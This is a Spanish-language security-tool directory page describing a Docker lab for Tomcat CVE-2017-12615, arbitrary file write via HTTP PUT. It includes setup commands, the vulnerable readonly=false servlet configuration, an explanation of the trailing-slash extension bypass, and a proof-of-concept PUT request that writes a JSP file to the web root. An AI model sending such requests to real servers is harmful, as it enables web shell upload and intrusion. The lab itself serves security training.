Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Tomcat-CVE-2017-12615 — Entorno de laboratorio basado en Docker para explotar la escritura arbitraria de archivos de Tomcat CVE-2017-12615 mediante el método PUT, con técnicas de evasión y código de prueba de concepto. | Kitploit
Herramientas/GitHubGitHub/cyberharsh/tomcat-cve-2017-12615
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubcyberharsh/tomcat-cve-2017-12615

Tomcat-CVE-2017-12615

Entorno de laboratorio basado en Docker para explotar la escritura arbitraria de archivos de Tomcat CVE-2017-12615 mediante el método PUT, con técnicas de evasión y código de prueba de concepto.

Ver Repositorio
1hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad de escritura arbitraria de archivos en Tomcat a través del método PUT (CVE-2017-12615)

中文版本(Versión china)

Versión de Tomcat: 8.5.19

Configuración del entorno

root@kitploit:~
docker-compose build
docker-compose up -d

Después de ejecutar los comandos anteriores correctamente, verá la página de ejemplo de Tomcat visitando el sitio http://your-ip:8080.

Fundamento

Enlaces de referencia:

  • http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
  • https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
  • https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e

Tomcat configura el permiso de escritura (readonly=false), lo que lleva a que podamos escribir archivos en el servidor.

root@kitploit:~
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

Aunque Tomcat verifica la extensión del archivo hasta cierto punto (no puede escribir jsp directamente), aún podemos eludir la limitación a través de algunas características del sistema de archivos (como usar / en Linux).

POC

Envíe los siguientes paquetes directamente y luego el shell se escribirá en el directorio raíz de la web.

root@kitploit:~
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

Como se muestra a continuación:

Descargar herramienta